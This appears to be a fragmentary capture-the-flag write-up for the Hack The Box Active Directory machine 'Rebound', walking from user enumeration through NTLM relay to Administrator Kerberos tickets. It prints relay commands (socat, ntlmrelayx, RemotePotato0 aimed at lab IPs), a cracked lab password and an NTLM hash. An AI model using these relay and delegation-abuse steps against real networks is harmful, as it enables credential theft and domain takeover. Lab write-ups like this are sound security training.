๐Rebound - HTB
https://app.hackthebox.com/machines/Rebound
Last updated
https://app.hackthebox.com/machines/Rebound
Last updated
Enumerating exist users
GetUsersSPNs to grab their ticket with no-preauth user jjones
ldap_monitor user were cracked
machine give error KRB_AP_ERR_SKEW(Clock skew too great)
after some googling i found this
synchronizing time with the domain time as kerberos is a time sensitive
Creating a TGT
after reviewing bloodhound
1- Add 'oorend' user to ServiceMgmt Group
2- Get FullControl on OU Service Users
3- Update winrm_svc password
first we need user tbrady
exploit RPC -> Ldap
https://github.com/antonioCoco/RemotePotato0
It abuses the DCOM activation service and trigger an NTLM authentication of any user currently logged on in the target machine. It is required that a privileged user is logged on the same machine (e.g. a Domain Admin user). Once the NTLM type1 is triggered we setup a cross protocol relay server that receive the privileged type1 message and relay it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can setup a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource. RemotePotato0 also allows to grab and steal NTLMv2 hashes of every users logged on a machine.
so this is what to do
1- setup a socat listener
socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999
2- setup a cross protocol relay <ntlmrelayx >se server
python3 ntlmrelayx.py -t ldap://10.10.11.231 --no-wcf-server --escalate-user winrm_svc
3- execute RemotePotato.exe
.\RemotePotato.exe -m 2 -s 1 -r 10.10.14.15 -x 10.10.14.15 -p 9999
cracked it with hashcat -m 5600
tbrady : 543BOMBOMBUNmanda
we cant get a shell with this user ,but we can still use bloodAD
The user tbrady has the ability to read the GMSA password of the delegator$ GMSA
The delegator GMSA has constrained delegation configured over the DC
hash
aad3b435b51404eeaad3b435b51404ee:9b0ccb7d34c670b2a9c81c45bc8befc3
getting a TGT for delegator$
uploading RunasCs.exe
we are able to execute commands as user tbrady ,lets upload reverseshell and give permission to folder
now from tbrady shell we execute Rubeus to improsenate administrator ticker
ticket not yet imported so we copy the <base64> and insert it in another command to import it
Administrator TGT imported
can take the decrypted ticket from base64 and convert it to be imported locally
found out that /etc/hosts must be
configuring Kerberos ticket delegation from the 'ldap_monitor' service principal to the 'delegator$' service principal using LDAPS
get ldap_monitor TGT
now impresonate dc01$
export the new administrator TGT